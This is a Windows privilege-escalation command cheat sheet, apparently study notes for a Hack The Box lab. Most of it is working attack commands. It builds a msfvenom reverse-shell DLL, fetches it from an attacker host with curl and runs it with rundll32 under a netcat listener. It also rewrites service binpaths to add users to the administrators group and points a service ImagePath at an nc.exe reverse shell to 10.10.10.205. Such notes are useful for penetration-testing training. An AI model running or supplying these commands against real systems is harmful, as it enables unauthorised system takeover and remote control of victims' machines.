List members of the administrators group
net localgroup administrators
Display the privileges of the current user
Query registry to check if UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Query registry for administrator consent prompt behavior
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
Get the OS version using PowerShell
[environment]::OSVersion.Version
Print the PATH environment variable
List tasks and filter for rundll32 processes
# Useful to identify suspicious rundll32 usage
tasklist /svc | findstr "rundll32"
Kill a process by specifying its PID
# Replace <pid> with the actual process ID
taskkill /PID <pid> /F
Generate a reverse TCP shell DLL using msfvenom
# Replace <attacker_ip> and <attacker_port> with actual values
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll
Start a Python HTTP server to host the DLL payload
python3 -m http.server <port>
Download the DLL file from the attacker's server using curl
curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll"
Set up Netcat listener to capture the reverse shell
nc -lvnp <attacker_port>
Execute the DLL payload using rundll32
rundll32 shell32.dll,Control_RunDLL C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll
Open advanced system properties dialog
C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe
Confirm the current user after potential privilege escalation
1. Permissive File System ACLs (SecurityService)
.\SharpUp.exe audit
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService
2. Weak Service Permissions (WindscribeService)
SharpUp.exe audit
accesschk.exe /accepteula -quvcw WindscribeService
net localgroup administrators
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
sc stop WindscribeService
sc start WindscribeService
net localgroup administrators
sc config WindScribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
sc start WindScribeService
sc query WindScribeService
3. Unquoted Service Paths (SystemExplorerHelpService)
sc qc SystemExplorerHelpService
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
4. Permissive Registry ACLs (ModelManagerService)
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
5. Modifiable Registry Autorun Binary
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
Key Concepts:
Weak Windows Permissions: Misconfigurations allow privilege escalation.
Service Focus: Services run as SYSTEM, key targets.
Approach, Commands, Tools, and Techniques:
Detect: SharpUp, accesschk, icacls, wmic, PowerShell (autorun).
Exploit: copy, sc config/start/stop, net localgroup, PowerShell (registry).
Verify: net localgroup, sc query.
Commands:
SharpUp, accesschk, icacls, sc, net localgroup, copy, wmic, PowerShell (Set-ItemProperty, Get-CimInstance).
